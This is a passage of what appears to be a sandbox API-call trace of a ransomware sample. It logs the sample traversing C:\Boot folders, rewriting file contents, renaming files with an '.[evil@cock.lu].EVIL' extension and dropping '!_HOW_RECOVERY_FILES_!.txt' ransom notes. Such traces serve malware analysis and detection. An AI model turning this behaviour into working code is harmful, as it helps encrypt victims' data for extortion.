(_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BCD") returned 0x0 [0077.262] wcslen (_String="C:\\\\Boot\\BCD") returned 0xc [0077.262] CreateFileW (lpFileName="C:\\\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.262] GetLastError () returned 0x20 [0077.262] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0077.262] wcsstr (_Str="BCD.LOG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.262] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\BCD.LOG") returned 16 [0077.262] wcscmp (_String1="BCD.LOG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.262] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BCD.LOG") returned 0x0 [0077.262] wcslen (_String="C:\\\\Boot\\BCD.LOG") returned 0x10 [0077.263] CreateFileW (lpFileName="C:\\\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.263] GetLastError () returned 0x20 [0077.263] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0077.263] wcsstr (_Str="BCD.LOG1", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.263] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\BCD.LOG1") returned 17 [0077.263] wcscmp (_String1="BCD.LOG1", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.263] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BCD.LOG1") returned 0x0 [0077.263] wcslen (_String="C:\\\\Boot\\BCD.LOG1") returned 0x11 [0077.263] CreateFileW (lpFileName="C:\\\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0077.266] ReadFile (in: hFile=0x17c, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdec20, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdec20*=0x0, lpOverlapped=0x0) returned 1 [0077.272] CloseHandle (hObject=0x17c) returned 1 [0077.272] MoveFileW (lpExistingFileName="C:\\\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), lpNewFileName="C:\\\\Boot\\BCD.LOG1.[evil@cock.lu].EVIL" (normalized: "c:\\boot\\bcd.log1.[evil@cock.lu].evil")) returned 1 [0077.273] ??_V@YAXPEAX@Z () returned 0x1 [0077.275] SetFileAttributesW (lpFileName="C:\\\\Boot\\BCD.LOG1", dwFileAttributes=0x0) returned 0 [0077.276] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0077.276] wcsstr (_Str="BCD.LOG2", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.276] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\BCD.LOG2") returned 17 [0077.276] wcscmp (_String1="BCD.LOG2", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.276] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BCD.LOG2") returned 0x0 [0077.276] wcslen (_String="C:\\\\Boot\\BCD.LOG2") returned 0x11 [0077.276] CreateFileW (lpFileName="C:\\\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0077.277] ReadFile (in: hFile=0x17c, lpBuffer=0x84b2e2f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdec20, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2f040*, lpNumberOfBytesRead=0x84b0fdec20*=0x0, lpOverlapped=0x0) returned 1 [0077.283] CloseHandle (hObject=0x17c) returned 1 [0077.283] MoveFileW (lpExistingFileName="C:\\\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), lpNewFileName="C:\\\\Boot\\BCD.LOG2.[evil@cock.lu].EVIL" (normalized: "c:\\boot\\bcd.log2.[evil@cock.lu].evil")) returned 1 [0077.284] ??_V@YAXPEAX@Z () returned 0x1 [0077.286] SetFileAttributesW (lpFileName="C:\\\\Boot\\BCD.LOG2", dwFileAttributes=0x0) returned 0 [0077.287] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0077.287] wcsstr (_Str="bg-BG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.287] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\bg-BG") returned 14 [0077.287] wcscmp (_String1=".", _String2="bg-BG") returned -1 [0077.287] wcscmp (_String1="..", _String2="bg-BG") returned -1 [0077.287] wcslen (_String="C:\\\\Boot\\bg-BG") returned 0xe [0077.287] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\bg-BG" | out: _Destination="C:\\\\Boot\\bg-BG") returned 0x0 [0077.287] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\bg-BG\\*") returned="C:\\\\Boot\\bg-BG\\*" [0077.287] FindFirstFileW (in: lpFileName="C:\\\\Boot\\bg-BG\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0077.329] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.329] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\bg-BG\\.") returned 16 [0077.329] wcscmp (_String1=".", _String2=".") returned 0 [0077.329] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.330] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.330] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\bg-BG\\..") returned 17 [0077.330] wcscmp (_String1=".", _String2="..") returned -1 [0077.330] wcscmp (_String1="..", _String2="..") returned 0 [0077.330] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.330] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.330] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\bg-BG\\bootmgr.exe.mui") returned 30 [0077.330] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.330] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0077.330] wcslen (_String="C:\\\\Boot\\bg-BG\\bootmgr.exe.mui") returned 0x1e [0077.330] CreateFileW (lpFileName="C:\\\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.330] GetLastError () returned 0x5 [0077.330] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0077.330] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0077.330] wcslen (_String="C:\\\\Boot\\bg-BG") returned 0xe [0077.330] strlen (_Str="${KEY}") returned 0x6 [0077.330] memchr (_Buf=0x84b116b6f0, _Val=36, _MaxCount=0x391) returned 0x84b116b8d0 [0077.330] memchr (_Buf=0x84b116b8d1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0077.330] strlen (_Str="${CODE}") returned 0x7 [0077.330] memchr (_Buf=0x84b116b6f0, _Val=36, _MaxCount=0x390) returned 0x84b116b8d0 [0077.331] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0077.331] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0077.331] _wfsopen (_FileName="C:\\\\Boot\\bg-BG\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0077.367] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0077.367] __uncaught_exception () returned 0x84b1160800 [0077.367] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0077.368] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0077.368] wcsstr (_Str="BOOTSTAT.DAT", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.368] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\BOOTSTAT.DAT") returned 21 [0077.368] wcscmp (_String1="BOOTSTAT.DAT", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.368] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BOOTSTAT.DAT") returned 0x0 [0077.368] wcslen (_String="C:\\\\Boot\\BOOTSTAT.DAT") returned 0x15 [0077.368] CreateFileW (lpFileName="C:\\\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0077.370] ReadFile (in: hFile=0x17c, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdec20, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdec20*=0x10000, lpOverlapped=0x0) returned 1 [0077.377] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0077.377] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0077.377] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0077.377] _errno () returned 0x84b1160840 [0077.377] SetFilePointer (in: hFile=0x17c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.377] WriteFile (in: hFile=0x17c, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x10020, lpNumberOfBytesWritten=0x84b0fdec20, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdec20*=0x10020, lpOverlapped=0x0) returned 1 [0077.377] CloseHandle (hObject=0x17c) returned 1 [0077.379] _wfsopen (_FileName="C:\\\\Boot\\BOOTSTAT.DAT", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0077.379] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0077.379] __uncaught_exception () returned 0x84b1160800 [0077.379] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0077.381] MoveFileW (lpExistingFileName="C:\\\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), lpNewFileName="C:\\\\Boot\\BOOTSTAT.DAT.[evil@cock.lu].EVIL" (normalized: "c:\\boot\\bootstat.dat.[evil@cock.lu].evil")) returned 1 [0077.381] ??_V@YAXPEAX@Z () returned 0x1 [0077.384] SetFileAttributesW (lpFileName="C:\\\\Boot\\BOOTSTAT.DAT", dwFileAttributes=0x0) returned 0 [0077.384] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0077.384] wcsstr (_Str="bootvhd.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.384] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\bootvhd.dll") returned 20 [0077.384] wcscmp (_String1="bootvhd.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.384] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootvhd.dll") returned 0x0 [0077.384] wcslen (_String="C:\\\\Boot\\bootvhd.dll") returned 0x14 [0077.384] CreateFileW (lpFileName="C:\\\\Boot\\bootvhd.dll" (normalized: "c:\\boot\\bootvhd.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.385] GetLastError () returned 0x5 [0077.385] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0077.385] wcsstr (_Str="cs-CZ", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.385] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\cs-CZ") returned 14 [0077.385] wcscmp (_String1=".", _String2="cs-CZ") returned -1 [0077.385] wcscmp (_String1="..", _String2="cs-CZ") returned -1 [0077.385] wcslen (_String="C:\\\\Boot\\cs-CZ") returned 0xe [0077.385] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\cs-CZ" | out: _Destination="C:\\\\Boot\\cs-CZ") returned 0x0 [0077.385] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\cs-CZ\\*") returned="C:\\\\Boot\\cs-CZ\\*" [0077.385] FindFirstFileW (in: lpFileName="C:\\\\Boot\\cs-CZ\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0077.388] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.388] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\cs-CZ\\.") returned 16 [0077.388] wcscmp (_String1=".", _String2=".") returned 0 [0077.388] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.388] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.388] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\cs-CZ\\..") returned 17 [0077.388] wcscmp (_String1=".", _String2="..") returned -1 [0077.388] wcscmp (_String1="..", _String2="..") returned 0 [0077.388] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.388] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.388] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 30 [0077.388] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.388] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0077.388] wcslen (_String="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 0x1e [0077.388] CreateFileW (lpFileName="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.388] GetLastError () returned 0x5 [0077.388] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.388] wcsstr (_Str="memtest.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.388] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\cs-CZ\\memtest.exe.mui") returned 30 [0077.388] wcscmp (_String1="memtest.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.388] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="memtest.exe.mui") returned 0x0 [0077.388] wcslen (_String="C:\\\\Boot\\cs-CZ\\memtest.exe.mui") returned 0x1e [0077.389] CreateFileW (lpFileName="C:\\\\Boot\\cs-CZ\\memtest.exe.mui" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.389] GetLastError () returned 0x5 [0077.389] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0077.389] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0077.389] wcslen (_String="C:\\\\Boot\\cs-CZ") returned 0xe [0077.389] strlen (_Str="${KEY}") returned 0x6 [0077.389] memchr (_Buf=0x84b116b6f0, _Val=36, _MaxCount=0x391) returned 0x84b116b8d0 [0077.389] memchr (_Buf=0x84b116b8d1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0077.389] strlen (_Str="${CODE}") returned 0x7 [0077.389] memchr (_Buf=0x84b116b6f0, _Val=36, _MaxCount=0x390) returned 0x84b116b8d0 [0077.389] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0077.389] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0077.389] _wfsopen (_FileName="C:\\\\Boot\\cs-CZ\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0077.390] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0077.390] __uncaught_exception () returned 0x84b1160800 [0077.390] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0077.391] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0077.391] wcsstr (_Str="da-DK", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.391] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\da-DK") returned 14 [0077.391] wcscmp (_String1=".", _String2="da-DK") returned -1 [0077.391] wcscmp (_String1="..", _String2="da-DK") returned -1 [0077.391] wcslen (_String="C:\\\\Boot\\da-DK") returned 0xe [0077.391] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\da-DK" | out: _Destination="C:\\\\Boot\\da-DK") returned 0x0 [0077.391] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\da-DK\\*") returned="C:\\\\Boot\\da-DK\\*" [0077.391] FindFirstFileW (in: lpFileName="C:\\\\Boot\\da-DK\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0077.391] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.391] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\da-DK\\.") returned 16 [0077.391] wcscmp (_String1=".", _String2=".") returned 0 [0077.391] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.391] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.391] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\da-DK\\..") returned 17 [0077.391] wcscmp (_String1=".", _String2="..") returned -1 [0077.392] wcscmp (_String1="..", _String2="..") returned 0 [0077.392] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.392] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.392] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\da-DK\\bootmgr.exe.mui") returned 30 [0077.392] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.392] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0077.392] wcslen (_String="C:\\\\Boot\\da-DK\\bootmgr.exe.mui") returned 0x1e [0077.392] CreateFileW (lpFileName="C:\\\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.392] GetLastError () returned 0x5 [0077.392] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.392] wcsstr (_Str="memtest.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.392] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\da-DK\\memtest.exe.mui") returned 30 [0077.392] wcscmp (_String1="memtest.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.392] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="memtest.exe.mui") returned 0x0 [0077.392] wcslen (_String="C:\\\\Boot\\da-DK\\memtest.exe.mui") returned 0x1e [0077.392] CreateFileW (lpFileName="C:\\\\Boot\\da-DK\\memtest.exe.mui" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.393] GetLastError () returned 0x5 [0077.393] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0077.393] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0077.393] wcslen (_String="C:\\\\Boot\\da-DK") returned 0xe [0077.393] strlen (_Str="${KEY}") returned 0x6 [0077.393] memchr (_Buf=0x84b116bf00, _Val=36, _MaxCount=0x391) returned 0x84b116c0e0 [0077.393] memchr (_Buf=0x84b116c0e1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0077.393] strlen (_Str="${CODE}") returned 0x7 [0077.393] memchr (_Buf=0x84b116bf00, _Val=36, _MaxCount=0x390) returned 0x84b116c0e0 [0077.393] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0077.393] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0077.393] _wfsopen (_FileName="C:\\\\Boot\\da-DK\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0077.460] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0077.460] __uncaught_exception () returned 0x84b1160800 [0077.460] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0077.461] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0077.461] wcsstr (_Str="de-DE", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.461] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\de-DE") returned 14 [0077.461] wcscmp (_String1=".", _String2="de-DE") returned -1 [0077.461] wcscmp (_String1="..", _String2="de-DE") returned -1 [0077.461] wcslen (_String="C:\\\\Boot\\de-DE") returned 0xe [0077.461] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\de-DE" | out: _Destination="C:\\\\Boot\\de-DE") returned 0x0 [0077.461] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\de-DE\\*") returned="C:\\\\Boot\\de-DE\\*" [0077.461] FindFirstFileW (in: lpFileName="C:\\\\Boot\\de-DE\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0077.461] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.461] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\de-DE\\.") returned 16 [0077.461] wcscmp (_String1=".", _String2=".") returned 0 [0077.461] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.462] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.462] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\de-DE\\..") returned 17 [0077.462] wcscmp (_String1=".", _String2="..") returned -1 [0077.462] wcscmp (_String1="..", _String2="..") returned 0 [0077.462] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.462] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.462] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\de-DE\\bootmgr.exe.mui") returned 30 [0077.462] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.462] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0077.462] wcslen (_String="C:\\\\Boot\\de-DE\\bootmgr.exe.mui") returned 0x1e [0077.462] CreateFileW (lpFileName="C:\\\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 